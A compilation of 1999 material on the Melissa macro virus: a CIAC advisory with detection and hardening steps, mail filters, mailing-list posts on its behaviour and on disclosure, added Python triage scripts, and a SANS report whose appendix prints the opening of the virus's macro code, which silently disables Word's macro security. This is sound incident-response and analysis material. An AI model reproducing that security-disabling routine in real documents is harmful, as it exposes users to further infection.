does detect the virus; the current live update does not. We have reliable
information that McAfee (http://vil.mcafee.com/vil/vm10120.asp), and
Trend Micro (http://housecall.antivirus.com/smex_housecall/technotes.html)
also have detection capabilities.

If you receive an e-mail with the following subject and body, DO NOT OPEN the
attachment.

Subject:
Important Message From <username>
Body:
Here is that document you asked for ... don't show anyone else ;-)

Make sure the sender is someone you know and then ask them if they really
sent you the attachment before opening it. If they did not send it, do not
open the attachment and contact your computer security manager. The most
common name for the attached file is list1.doc but that name can change.

If the following text appears in a document without your putting it there,
your normal.dot template is infected and your Word program is infecting all
documents when you close them.

Twenty-two points, plus triple-word-score, plus fifty points for using
all my letters. Game's over. I'm outta here.


Another option to see if a system has been infected is to use Regedit and
search for the following registry key:

HKEY_CURRENT_USER\Software\Microsoft\Office\Melissa?

If that key exists and has the value "... by Kwyjibo" the system has been
infected at some time. Note that the infection may have been removed without
deleting the key. This key can be deleted, but does no damage if left alone.
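
The marker check above as a script you can run across many machines. This is an
added example, not part of the CIAC advisory: it assumes each user's Office key
has been exported with regedit (regedit /e office.reg
HKEY_CURRENT_USER\Software\Microsoft\Office) and parses the resulting text
files offline, so it needs no Windows registry access at run time. It also
reports the Word 2000 Security\Level value that the macro on this page sets to
1; a user could have chosen that level by hand, so treat it as a lead rather
than proof. The sample exports embedded in the block are constructed.

```python
"""Scan regedit exports for the Melissa infection marker.

Added example, not part of the CIAC advisory. Assumes each user's Office key
was exported with:
    regedit /e office.reg HKEY_CURRENT_USER\\Software\\Microsoft\\Office
and parses the REGEDIT4 / "Windows Registry Editor" text format offline,
so it runs on any platform. The sample exports below are constructed.
"""
import re
import sys

MARKER_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Office"
MARKER_NAME = "Melissa?"
MARKER_VALUE = "... by Kwyjibo"
# Key the macro on this page writes Level=1 to under Word 2000 (assumption:
# the same key holds a user's own Tools/Macro/Security choice).
WORD2000_SECURITY_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"

_SECTION = re.compile(r"^\[(.+)\]$")
_STRING = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
_DWORD = re.compile(r'^"((?:[^"\\]|\\.)*)"=dword:([0-9A-Fa-f]{1,8})$')


def _unescape(s):
    # .reg files escape backslashes and double quotes inside strings
    return s.replace('\\"', '"').replace("\\\\", "\\")


def parse_reg_export(text):
    """Return {key_path_lowercased: {value_name: value}} for string and
    dword values. Other value types (hex:, expand strings) are skipped."""
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("REGEDIT4") or line.startswith("Windows Registry Editor"):
            continue
        m = _SECTION.match(line)
        if m:
            current = m.group(1).lower()   # registry paths are case-insensitive
            keys.setdefault(current, {})
            continue
        if current is None:
            continue
        m = _STRING.match(line)
        if m:
            keys[current][_unescape(m.group(1))] = _unescape(m.group(2))
            continue
        m = _DWORD.match(line)
        if m:
            keys[current][_unescape(m.group(1))] = int(m.group(2), 16)
    return keys


def triage(text):
    """Return a list of findings for one export; an empty list means nothing seen."""
    keys = parse_reg_export(text)
    findings = []
    marker = keys.get(MARKER_KEY.lower(), {}).get(MARKER_NAME)
    if marker == MARKER_VALUE:
        findings.append("marker: Melissa? = '... by Kwyjibo' (infected at some time; "
                        "the infection may already have been cleaned)")
    elif marker is not None:
        findings.append("marker: Melissa? present with unexpected value %r" % (marker,))
    level = keys.get(WORD2000_SECURITY_KEY.lower(), {}).get("Level")
    if level in (1, "1"):
        findings.append("word2000: Security\\Level = 1, the value the macro writes "
                        "(a user may also have chosen it; treat as a lead)")
    return findings


def read_export(path):
    """regedit writes REGEDIT4 files as ANSI and version 5.00 files as UTF-16."""
    with open(path, "rb") as fh:
        data = fh.read()
    if data.startswith(b"\xff\xfe"):
        return data.decode("utf-16")
    return data.decode("latin-1")


# Constructed sample exports (not real captures)
INFECTED_EXPORT = r"""REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Office]
"Melissa?"="... by Kwyjibo"

[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]
"Level"=dword:00000001
"""

CLEAN_EXPORT = r"""REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Office]

[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]
"Level"=dword:00000003
"""

if __name__ == "__main__":
    for path in sys.argv[1:]:
        for finding in triage(read_export(path)) or ["clean"]:
            print("%s: %s" % (path, finding))
```

Run it as `python melissa_triage.py *.reg` over the collected exports. A marker
hit means the machine ran the macro at some point, not that it is still
infected; follow up with the Normal.dot and document checks described above.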

Protecting A System
===================

The first step in protecting a system is to have a current antivirus package
running on your system. Be sure to update it at least once a month. Many of
the newer antivirus scanners have the capability to automatically update
themselves every couple of weeks.

To protect Word from this and other Word macro viruses, first ensure that Word
has been patched with the Word 97 Template vulnerability patch
(http://www.microsoft.com/security/bulletins/ms99-002.asp); second, the
normal.dot template file should be password protected; and third, the
following Word 97 options should be enabled.

Confirm conversions at open.
Macro virus protection.
Prompt to save Normal template.

Password Protecting The Normal.dot File
---------------------------------------

To password protect the Normal.dot file in Word 97, perform these steps:

1. Start Word.
2. Choose the Tools, Macro, Visual Basic Editor command.
3. In the Project window of the Visual Basic Editor, click on Normal.
4. Choose the Tools, Normal Properties command, Protection tab.
5. Check the Lock Project for Viewing check box and type in a password twice.
6. Close the dialog box, close the Visual Basic editor.
7. Quit Word.

The next time you start Word, the normal.dot template will be protected.

WARNING: If you ever have to type in the password to make changes to the
normal.dot file be aware that the file remains unprotected until you quit
Word and restart it.

Turning On Macro Virus Protection and Other Options
---------------------------------------------------

Some simple macro virus protection is built into Word 97. It does not detect
specific macro viruses but only informs you if macros exist on a document you
are trying to open. Macros detected by Macro Virus Protection are not
necessarily a virus. However, if you are alerted to a macro attached to a
document you should be extremely wary because most people do not have macros
attached to their documents.

Other options to set are:

Confirm conversions at open. This makes Word display a dialog box if
it is converting a document from one format to another.

Prompt to save Normal template. This makes Word display a dialog box
asking you to confirm changes to the Normal.dot template. Most
macro viruses hide in Normal.dot so this lets you know that there
has been a change that you may want to prevent. Changes also occur
when you change the default font or one of the built-in styles.


To turn on macro virus protection and these other options, perform these
steps:

1. Start Word.
2. Choose the Tools, Options command, General tab.
3. Check the Macro Virus Protection check box.
4. Check the Confirm conversions at open check box.
5. Choose the Save tab.
6. Check the Prompt to save Normal template check box.
7. Close the dialog box.

Whenever you open a document that contains macros, the macro virus protection
opens a dialog box telling you that there are macros in the document and
giving you the option to: Open the document with the macros enabled, open
the document without the macros, or cancel the open operation. You should
only open a document with macros enabled if you are expecting there to be
macros on that document and you know what they are supposed to do.

Detecting the Virus With a Mail Server
======================================

If a site has been infected you may need to block the virus infected mail
messages with your mail servers. The following filter was written by Scott
Hutton (Lead Security Engineer, Information Technology Security Office) of
Indiana University. As Scott mentions, this filter blocks all messages with
the text "Important Message From" in the subject line, which may block
messages that do not contain the virus. Use this filter at your own
discretion.

===== start included text ======
We blocked this on our mail relays through the following additions to
the sendmail.cf:

HSubject: $>CheckSubject
SCheckSubject
RImportant Message From $+ $#error $: 553 Subject Error
R$* $@ OK

Don't forget that there are tabs before $#error and $@ OK. This will
block any message where the subject begins with "Important Message
From ...", which may be too rash of an action at your site.

===== end included text ======

Another filter was obtained by the CERT team from Nick Christenson of
sendmail.com

ftp://ftp.cert.org/pub/cert_advisories/Patches/CA-99-04-sendmail-melissa-filter.txt
_____________________________________________________________________________
Thanks to Scott Hutton for the preliminary analysis and for a sendmail
filter. Thanks to CERT and Nick Christenson of sendmail.com for another
sendmail filter.
_____________________________________________________________________________

CIAC, the Computer Incident Advisory Capability, is the computer
security incident response team for the U.S. Department of Energy
(DOE) and the emergency backup response team for the National
Institutes of Health (NIH). CIAC is located at the Lawrence Livermore
National Laboratory in Livermore, California. CIAC is also a founding
member of FIRST, the Forum of Incident Response and Security Teams, a
global organization established to foster cooperation and coordination
among computer security teams worldwide.

CIAC services are available to DOE, DOE contractors, and the NIH. CIAC
can be contacted at:
Voice: +1 925-422-8193
FAX: +1 925-423-8002
STU-III: +1 925-423-2604
E-mail: ciac@llnl.gov

For emergencies and off-hour assistance, DOE, DOE contractor sites,
and the NIH may contact CIAC 24-hours a day. During off hours (5PM -
8AM PST), call the CIAC voice number 925-422-8193 and leave a message,
or call 800-759-7243 (800-SKY-PAGE) to send a Sky Page. CIAC has two
Sky Page PIN numbers, the primary PIN number, 8550070, is for the CIAC
duty person, and the secondary PIN number, 8550074 is for the CIAC
Project Leader.

Previous CIAC notices, anti-virus software, and other information are
available from the CIAC Computer Security Archive.

World Wide Web: http://www.ciac.org/
(or http://ciac.llnl.gov -- they're the same machine)
Anonymous FTP: ftp.ciac.org
(or ciac.llnl.gov -- they're the same machine)
Modem access: +1 (925) 423-4753 (28.8K baud)
+1 (925) 423-3331 (28.8K baud)

CIAC has several self-subscribing mailing lists for electronic
publications:
1. CIAC-BULLETIN for Advisories, highest priority - time critical
information and Bulletins, important computer security information;
2. SPI-ANNOUNCE for official news about Security Profile Inspector
(SPI) software updates, new features, distribution and
availability;
3. SPI-NOTES, for discussion of problems and solutions regarding the
use of SPI products.

Our mailing lists are managed by a public domain software package
called Majordomo, which ignores E-mail header subject lines. To
subscribe (add yourself) to one of our mailing lists, send the
following request as the E-mail message body, substituting
ciac-bulletin, spi-announce OR spi-notes for list-name:

E-mail to ciac-listproc@llnl.gov or majordomo@tholia.llnl.gov:
subscribe list-name
e.g., subscribe ciac-bulletin

You will receive an acknowledgment email immediately with a confirmation
that you will need to mail back to the addresses above, as per the
instructions in the email. This is a partial protection to make sure
you are really the one who asked to be signed up for the list in question.

If you include the word 'help' in the body of an email to the above address,
it will also send back an information file on how to subscribe/unsubscribe,
get past issues of CIAC bulletins via email, etc.

PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing
communities receive CIAC bulletins. If you are not part of these
communities, please contact your agency's response team to report
incidents. Your agency's team will coordinate with CIAC. The Forum of
Incident Response and Security Teams (FIRST) is a world-wide
organization. A list of FIRST member organizations and their
constituencies can be obtained via WWW at http://www.first.org/.

This document was prepared as an account of work sponsored by an
agency of the United States Government. Neither the United States
Government nor the University of California nor any of their
employees, makes any warranty, express or implied, or assumes any
legal liability or responsibility for the accuracy, completeness, or
usefulness of any information, apparatus, product, or process
disclosed, or represents that its use would not infringe privately
owned rights. Reference herein to any specific commercial products,
process, or service by trade name, trademark, manufacturer, or
otherwise, does not necessarily constitute or imply its endorsement,
recommendation or favoring by the United States Government or the
University of California. The views and opinions of authors expressed
herein do not necessarily state or reflect those of the United States
Government or the University of California, and shall not be used for
advertising or product endorsement purposes.

LAST 10 CIAC BULLETINS ISSUED (Previous bulletins available from CIAC)

J-026: HP-UX rpc.pcnfsd Vulnerability
J-027: Digital Unix Vulnerabilities (at, inc)
J-028: Sun Solaris Vulnerabilities (sdtcm_convert, man/catman, CDE)
J-029: Buffer Overflows in Various FTP Servers
J-030: Microsoft BackOffice Vulnerability
J-031: Debian Linux "Super" package Buffer Overflow
J-032: Windows Backdoors Update II:
J-034: Cisco 7xx TCP and HTTP Vulnerabilities
J-035: Linux Blind TCP Spoofing
J-036: LDAP Buffer overflow against Microsoft Directory Services


-----BEGIN PGP SIGNATURE-----
Version: PGP for Business Security 5.5.2

iQCVAwUBNv07sLnzJzdsy3QZAQEZjwQA6+nHONNAmoosXGsy9eJ6nuIPlFNQ3nM9
+XN1vnqBNI9Hp3kBIXtPXywY4W19NQbyyax6YI+ugmmNfNPEdefeHqnNGuz3dqcW
Ce2RQWnPB1dRrUBTorU+cZHsaq+qaX4s2jSNFlJCFeSuUjNYhzVI6HHilhvGZCQI
wuSjLbuYabo=
=KVaC
-----END PGP SIGNATURE-----

----------------------------------------------------------------------------

Date: Sun, 28 Mar 1999 18:12:54 -0500 (EST)
From: Greg A. Woods <woods@most.weird.com>
Reply-To: Phil-Sec@datasys.net
To: Phil-Sec@datasys.net
Subject: RE: Phil-Sec: `Good Times', come to life: Melissa

[ On Sunday, March 28, 1999 at 16:49:49 (-0500), ROD VERNEN wrote: ]
> Subject: RE: Phil-Sec: `Good Times', come to life: Melissa
>
> Good points. But WinWord can be configured to require confirmation
> before executing a macro. This is an area where user education is
> critical...

The Melissa "virus" isn't just an ordinary "word processor" macro but
rather a Visual BASIC Application extension thing that gets run by the
application when the document is open. According to CERT neither Word97
nor Word2000 list the macro when an infected document is opened with
macros disabled, even if you explicitly look for macros -- i.e. you can
only see the macro if you let it execute. This is absurdly stupid.

(And of course what's also insidious, and new to me, about this "virus" is
that it immediately and silently disables the feature which would
normally require confirmation before executing macros, thus opening up
the door for its simpler brethren, so to speak.)

--
Greg A. Woods

+1 416 218-0098 VE3TCP <gwoods@acm.org> <robohack!woods>
Planix, Inc. <woods@planix.com>; Secrets of the Weird <woods@weird.com>

----------------------------------------------------------------------------

Date: Sat, 27 Mar 1999 21:58:17 -0800
From: Nate Lawson <nate@ROOT.ORG>
To: BUGTRAQ@netspace.org
Subject: Malicious code detection and full disclosure

I have been getting a lot of flames and veiled threats from individuals
and "virus researchers" for posting the code yesterday. There seems to be
a lot of misinformation going around so I wanted to clarify the situation.
These people are all producing the same arguments:

1. "Posting the source allows someone to know how to write a Macro virus"

Yes, and anyone of the 100,000 or more people who got the virus the other
day can buy VB and do File->Open and see the source. Repeat after me:
"Word macros are INTERPRETED". All symbol information is present. No
decompilation necessary.

2. "By reformatting the source, you have created a new variant"

What? Your virus scanner could be thwarted by adding whitespace? Someone
has a problem but it isn't me. Perhaps you'd best learn from the sandbox
mechanisms of Java or virus scanners like F-PROT. A virus is not a virus
because it has the string "By 3le3t3 DudEZ" followed by three tabs. It is
a virus because it does things like update Normal.dot. Repeat after me:
"Pattern matching alone does not a virus scanner make". Just as in the
recent thread about security scanners doing version-checking instead of
exploiting a hole, the best answer is to use a combination of techniques
to identify flaws or malicious code and then notify the user of any
uncertainties in the detection mechanism.

A perfect parallel to this is the Internet worm. We were reminded of that
time as we paused the Exchange SMTP service to keep the program from
spreading. Also, it was important to quickly analyze the program, making
sure it did nothing malicious like mailing a person's files to another
location. After doing this, I believed the code itself would help others
do the same if they needed to. An important note is that the Symantec and
McAfee web pages describing the virus both left out important information
(for instance, avertlabs.com neglected to mention the active document and
Normal.dot file infection). If I had made any mistakes in my analysis,
another could have determined this for himself.

A good reference is the paper "With Microscope and Tweezers, An Analysis
of the Internet Worm" by Mark Eichin and Jon Rochlis. It can be found at:

http://www.mit.edu:8001/people/eichin/www/virus/main.html

In short, this is the same full disclosure vs. security through obscurity
debate. Make your own decision what is appropriate; my mind has been made
up in regards to this for at least a decade. Viruses tend to be
uninventive and boring. This one was extremely unsophisticated, exploited
no new holes, and required user carelessness to spread. I only got
involved because I had to help fend off the nuisance Friday. I hope
everyone found the postings useful and will demand better virus protection
than string matching from their virus scanner vendor as well as request
that Microsoft add more virus prevention than "enable macros? yes/no" and
disallow macros from doing things like sending mail or writing to files
without notice to the user.

-Nate

----------------------------------------------------------------------------

Date: Sat, 27 Mar 1999 20:12:22 -0800
From: John D. Hardin <jhardin@wolfenet.com>
To: BUGTRAQ@netspace.org
Subject: Re: Blocking the Melissa Trojan

On Sat, 27 Mar 1999, Brett Glass wrote:

>At 03:28 PM 3/27/99 -0800, John D. Hardin wrote:
>>On Sat, 27 Mar 1999, Brett Glass wrote:
>>
>>> Excellent. Is there a default "poisoned executables" file in the
>>> package? Or do admins have to construct a list themselves?
>>
>>They have to make it themselves if they wish to use the facility. The
>>web page has a suggested list of filenames.
>
> Sounds good. Now, for the next twist to the story.
>
> It turns out that the Melissa code also infects NORMAL.DOT, so that
> the computer starts producing infected documents. When one of those
> documents hits a machine that hasn't been infected yet, that machine
> sends out a barrage of e-mail.... Using the NEW document as the
> attachment! It'll have a different name. So, we also need to filter
> by subject and body.

That's a job that regular procmail is well suited to. If the subject
is fixed (hang on, reading bugtraq...)

Per Aleph1:
The subject line is "important Message From <some user name>". The
body consist of the text "Here is that document you asked for...
don't show anyone else;-)".

That's fairly simple...

:0 H
* ^Subject:.*important Message From
{
  # Subject matched; now require the fixed body text and a Word attachment
  :0 B
  * Here is that document you asked for
  * don't show anyone else
  * ^Content-.*: .*\.do[ct]
  {
    LOG='REJECT Possible "Melissa" Microsoft Word macro worm: '

    :0
    security-quarantine
  }
}

--
John Hardin KA7OHZ jhardin@wolfenet.com
pgpk -a finger://gonzo.wolfenet.com/jhardin PGP key ID: 0x41EA94F5
PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5 E9 BF C8 33 A7 A9 CE 76
-----------------------------------------------------------------------
In the Lion
the Mighty Lion
the Zebra sleeps tonight...
Dee de-ee-ee-ee-ee de de de we um umma way!
-----------------------------------------------------------------------
52 days until Star Wars episode I
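
The same filter as code: an added example, not part of John Hardin's post or
of the CIAC sendmail rule, combining the three signals this thread identifies
(the subject prefix, the fixed body text, and a Word attachment whose name may
vary) in Python so it can be tested offline. Matching the application/msword
MIME type as a second way to spot a renamed Word part is my addition, and the
sample messages in the block are constructed.

```python
"""Melissa relay filter as a Python function, showing the same three checks
the procmail recipe above encodes (subject prefix, fixed body text, Word
attachment) without trusting the attachment name. Added example, not code
from the posts; the messages below are constructed."""
import re
from email import message_from_string

SUBJECT_RE = re.compile(r"^\s*important message from\b", re.IGNORECASE)
BODY_PHRASES = ("here is that document you asked for", "don't show anyone else")
WORD_NAME_RE = re.compile(r"\.do[ct]$", re.IGNORECASE)   # .doc and .dot templates


def _text_parts(msg):
    """Yield decoded text/plain bodies (the message text, not attachments)."""
    for part in msg.walk():
        if part.get_content_type() == "text/plain" and part.get_filename() is None:
            payload = part.get_payload(decode=True) or b""
            yield payload.decode(part.get_content_charset() or "latin-1", "replace")


def _word_attachments(msg):
    """Yield names of parts that look like Word documents, by name or MIME type."""
    for part in msg.walk():
        name = part.get_filename()
        if (name and WORD_NAME_RE.search(name)) or part.get_content_type() == "application/msword":
            yield name or "(unnamed)"


def classify(raw):
    """Return a verdict dict; 'quarantine' only when all three signals agree,
    which keeps ordinary 'Important Message From ...' mail flowing."""
    msg = message_from_string(raw)
    subject_hit = bool(SUBJECT_RE.match(msg.get("Subject", "")))
    body = " ".join(_text_parts(msg)).lower()
    body_hit = all(phrase in body for phrase in BODY_PHRASES)
    attachments = list(_word_attachments(msg))
    verdict = "quarantine" if subject_hit and body_hit and attachments else "pass"
    return {"verdict": verdict, "subject": subject_hit, "body": body_hit,
            "attachments": attachments}


# Constructed sample messages (not real captures)
SAMPLE_MELISSA = """\
From: Jane Doe <jane@example.org>
To: ops@example.org
Subject: Important Message From Jane Doe
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="us-ascii"

Here is that document you asked for ... don't show anyone else ;-)

--b1
Content-Type: application/msword; name="list1.doc"
Content-Disposition: attachment; filename="list1.doc"
Content-Transfer-Encoding: base64

0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAAAAA
--b1--
"""

# Same worm sent from an already-infected Normal.dot: different file name,
# different capitalisation of the subject
SAMPLE_RENAMED = SAMPLE_MELISSA.replace("list1.doc", "budget99.doc").replace(
    "Important Message From Jane Doe", "important Message From Bob Smith")

SAMPLE_LEGIT = """\
From: hr@example.org
To: ops@example.org
Subject: Important Message From HR

Here is the updated holiday schedule for April.
"""

if __name__ == "__main__":
    for label, raw in (("melissa", SAMPLE_MELISSA), ("renamed", SAMPLE_RENAMED),
                       ("legit", SAMPLE_LEGIT)):
        print(label, classify(raw))
```

On a relay, apply the verdict during the SMTP transaction and reject with a
5xx code as the sendmail rule does, rather than accepting and bouncing, so a
forged sender does not receive the backscatter.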

----------------------------------------------------------------------------

Date: Sat, 27 Mar 1999 12:16:29 +0000
From: Vesselin Bontchev <bontchev@COMPLEX.IS>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: [BugTraq] Melissa Macro Virus (fwd)

Aaron Wood writes (my comments are on Trend's press release forwarded by
him):

> In Word97, the virus disables the Tools/Macro menu commands, the
> Confirm Conversions option, the MS Word macro virus protection, and
> the Save Normal Template prompt.

In Word 2000, the virus disables the Tools/Macro/Security menu.

> The name of the original infected attachment was List.doc, but it
> could be any name.

Theoretically, yes. But keep in mind, that the virus sends itself by
e-mail only when it infects a clean system. What it sends, is the
document which has infected the system. Originally, the virus was
distributed in a file named LIST.DOC and posted to alt.sex by a person
known to have posted new viruses to the newsgroups before. So, in most
cases this is the document which infects the systems for the first time
and it is what is sent around. The only way to begin sending something
else is if you get infected by opening another user's infected document
which you have received by other means (i.e., not by the virus sending
it to you).

> If the user does not have Outlook, the virus will not work.

That's not true - the virus works perfectly, in the sense that it
replicates and infects. It just can't send itself around in e-mail
attachments. But, as we know, this is by far not the only way a virus
can use to spread. :-)

Another thing - the virus never terminates the copy of Outlook it starts
- at least not explicitly. I haven't verified that, but if that copy
really remains in memory, opening several infected documents would
eventually slow down and crash your system - because of the many copies
of Outlook running in the background. The virus starts Outlook each time
you open an infected document - although it sends itself by e-mail only
if the system wasn't already infected.

> After that, the virus checks to see if the normal template and active
> document are infected, and if either is not, it infects the file.

"File" here means "whatever is not infected - either the active document
or the normal template".

> Trend Micro has detection for this virus in its latest pattern update,

Most anti-virus producers have. The update for our product (F-PROT and
F-MACROW) can be found at the usual place:

ftp://ftp.complex.is/pub/macrdef2.zip

Regards,
Vesselin
--
Vesselin Vladimirov Bontchev, not speaking for FRISK Software International,
producers of F-PROT. Postholf 7180, IS-127 Reykjavik, Iceland
e-mail: bontchev@complex.is, tel.: +354-561-7273, fax: +354-561-7274
PGP 2.6.2i key fingerprint: E5 FB 30 0C D4 AA AB 44 E5 F7 C3 18 EA 2B AE 4E

----------------------------------------------------------------------------

Date: Mon, 29 Mar 1999 14:46:24 -0500 (EST)
From: sans@clark.net
Subject: EXTRA: SANS Flash Report on the Melissa Virus

Once or twice a year, the magnitude of a security event is great enough
to merit a SANS Flash Report. It is amazing and coincidental that it
happens in the same 24 hour period that we send out the first SANS
Newsbites.

NOTE: SANS will be changing email and web servers this week. We hope
to avoid service interruptions, but some error might creep in. Problems
to <kolstad@delos.com>.

Table of Contents:
1. What Melissa teaches us
1.1 Infection Speed
1.2 Collateral Damage
1.3 Need for Defense in Depth
2. One site's experience in cleaning up after a Melissa infestation
3. Conclusion
Appendix: Melissa Source Code

You will already have heard of the Melissa virus, at least from the SANS
Newsbites, and probably also from newspapers and friends, as well. An
excellent description of the virus, including how to identify it and
contain it at the host level, was developed by the Computer Emergency
Response Team at Carnegie Mellon University. This document is available
at: http://www.cert.org/advisories/CA-99-04-Melissa-Macro-Virus.html .

The major anti-virus vendors have already released descriptions and
anti-viral signatures. URLs for NAI and Symantec are listed below:
http://www.avertlabs.com/public/datafiles/valerts/vinfo/melissa.asp
http://www.symantec.com/avcenter/venc/data/mailissa.html

The rapid response of these organizations has been very impressive, and
your response should be equally rapid. If you have not yet taken the
steps described in the CERT advisory, follow the instructions referenced
above and get your site's virus signatures updated and the infected
machines contained and cleaned. Then read the rest of this document
that tells some of the lessons learned and also the bigger picture
surrounding the Melissa Macro virus. We discuss the implications of
information gathering viruses like Melissa, the process and impact of
cleaning up after an outbreak at a military site and finally, share a
non-working version of the code to help you understand what these viruses
do.

1. What Melissa teaches us

1.1 Infection Speed

According to NAI's web site listed above, the virus was first discovered
on an "alt.sex" newsgroup and spread rapidly. On the same day the virus
was first discovered "in the wild" it caused major infections and reports
from a large number of Department of Defense and Department of Energy
sites. Many of you will probably find out today that your site has been
infected as well. This serves as a warning how fast a virus with an
unknown signature can spread. A modified, non-operative copy of the
source code is included as an appendix to this document. If you search
the listing for the string "For y = 1 To", you can see how the virus
replicated so rapidly by going through Microsoft Outlook address books
and sending itself to the first 50 entries in each book. Sections in
the code that have been the subject of news reports are marked with
comments that begin with ***.

Useful Background Information: In the March 2nd SANS First Tuesday
Intrusion Detection Web Broadcast, archived at
http://www.sans.org/webarchives.htm, Stephen Northcutt described another
MS Word Macro Virus, M97.Marker.a. Marker is an information gathering
virus which uses FTP to send the Microsoft Office registration information
of infected systems to outside organizations. Northcutt described how
this same technique would allow a prospective attacker to develop an
infection map and by knowing who sends what to whom, to target future
attacks.

1.2 Collateral Damage

The Melissa virus apparently does not create any other damage in the
sense of deleting, or stealing files. However, when the smoke clears,
the cost of dealing with Melissa will be measured in the millions of
dollars. It also directly affects sites' ability to send and receive
email. One network engineer, who worked at one of the first sites to
report the problem last Friday March 26, said "I knew something was
wrong before I knew what was wrong. I could feel the network going
slower and slower. As I looked into it, I found the exchange mail
servers were melting down." One of the lessons of Melissa is that a
macro virus can hit very fast and very hard. The engineer went on to
say, "As I composed the last email of the day, a message hit the Inbox
of my Microsoft Outlook email application. The subject line read:
"Important Message From [Jane Doe]". I viewed the message, and the body
read "Here is that document you asked for... don't show anyone else ;-)"
Attached was a Microsoft Word document titled "list1.doc".

"Although I hadn't requested any documents from [Jane Doe], I was
expecting a couple of them from other people. It wasn't inconceivable
to think that she had become involved, even though I didn't know who
she was. I double-clicked on the Word document. A pop-up window appeared,
warning me that a macro was contained in the document, and that macros
can potentially be dangerous. I knew that... :-) So, I shut down the
Word application, and checked the document with several of the virus
detection packages that I had. Everything appeared clean."

"Since this was from someone in my organization, apparently a trusted
source, I went ahead and opened the document with the macros enabled.
In less than a second, a duplicate of the message had hit my mailbox,
this time with my name attached. I hit the power-off button on my
computer, but it was late. The payload had been delivered. My name
was now attached to a file containing pornographic web sites, and an
apparent username and password for each site. Moments later, duplicate
messages from others who had made the same mistake began to appear."

"At this point I knew we, as an organization, were in trouble. This
virus (or worm) was snowballing fast, too fast. I immediately called
our information systems security manager, only to find that his phone
was already busy. I left a voicemail detailing my appraisal of the
situation, and my fear that this incident could get serious... very
quickly. What I didn't know was that I was too late, it was already
*very* serious."

1.3 Need for Defense in Depth

Though Melissa is primarily spread by e-mail, passing an infected floppy
disk works just as well to move the virus to a new system, possibly even
a new organization. If there was ever any doubt about whether we need
to take virus countermeasures seriously, that time is past. We recommend
virus scanning at the firewall, on servers, and on the desktop systems
as well as physical entry points for magnetic media for sites that want
to avoid the kind of punch Melissa exhibited.

2. One site's experience in cleaning up after a Melissa infestation

Here's a first-person description of the process one site used to clean
up after being hit by Melissa.

"As soon as we discovered the virus late Friday afternoon, we disconnected
our servers (all SMTP relays and Exchange servers at our Internet
connection) from the network until we could contain the infection. This
happened at approximately 1800 hours Friday.

"System administrators for both corporate and departmental Exchange
servers worked through Friday night and well into Saturday. Many returned
Saturday and again on Sunday to complete the isolation and cleanup. They
cleaned up the Exchange servers with updated anti-viral signatures as
soon as they were available. The corporate servers and one departmental
server were ready to come back on-line late Sunday. We left IMS (Internet
Mail Service) disabled until we could contain (filter) email at the SMTP
server.

"Our version of sendmail is one removed from the latest and filter
updates provided by the author would not work on our version. We resorted
to getting the word out for ALL users to update the AV signatures and
refrain from sending Word docs until any with macros had been identified
as coming from trusted sources. The administrator for the SMTP relay
host downloaded a trial version of InterScan VirusWall from TrendMicro.
For more info, see: http://www.antivirus.com/products/isvw/index.htm

"The clean-up picture would have been much bleaker if we hadn't had so many
things in our favor:
* System administrators were still at work when the problem started
(approximately 1640 on Friday).
* Most of the users were gone for the weekend (and didn't compound the
problem by manually sending additional copies of the infected document).
* All of the system administrators involved in the clean up had been trained
in incident handling based on the SANS' Incident Handling Step by Step
approach.
* The person who needed to make key decisions was trained in incident
response and had already begun carrying a cell phone.
* Base commanders recognized the expertise that was in use and supported
the Incident Handling team by not directing what needed to be done (at
least so far)."

Note: The stages of incident handling are: preparation, identification,
containment, eradication, and follow-up. The URLs at the beginning of
this document can help you with identification and eradication. Your
organization may need to consider email server down time in order to
achieve containment. You may also want to consider setting up non-email
communication channels for your organization. If you do not know how
to build a telephone call tree, look for a "soccer mom". They know how
to spread important information very efficiently. In this way, if you
do suffer an email meltdown, you can still get important information,
such as where to acquire the latest anti-virus software, to your users.

3. Conclusion

Because Melissa exploits one of the most valuable benefits of the net
-- the ability to share documents -- to propagate and to multiply itself,
it will affect far more people far more quickly than earlier viruses.
The silver lining in this cloud is that a relatively benign virus like
Melissa is a low-cost way of gaining user awareness. That same mechanism
can be used by a more malicious attacker to make private information
public and to destroy large amounts of important data. It makes sense
for you to use this opportunity to establish three capabilities if you
have not already done so:
(1) user responsibility and active involvement in protecting their
systems
(2) an incident handling capability (Order Incident Handling Step-by-Step
from the SANS bookstore www.sans.org if you don't already have a roadmap)
(3) user awareness of what to look for, whom to call, and what to say
when they call about a security threat.

In addition, we at SANS want to hear your experiences and the lessons
you learned in responding to Melissa. Please send your Melissa-related
tips, tricks, techniques, experiences and lessons learned to info@sans.org
with Melissa in the subject line. This type of sharing can help all
sites be in a better position to respond the next time an event like
this occurs.

Appendix: Melissa Source Code

NOTE: Several errors have been introduced into this copy of the code as
a safety measure. It will not run in this form. We hope the code we
changed will not overly impact your opportunity to understand how the
software works, but we could not be responsible for furthering the spread
of the live version of Melissa. Text comments have been inserted at
the "famous" locations preceded by three asterisks "***"

*** Begins by checking security, the environment, and whether already
infected

Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
"Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
"Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):
Options.SaveNormalPrompt = (1 - 1)
End If

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
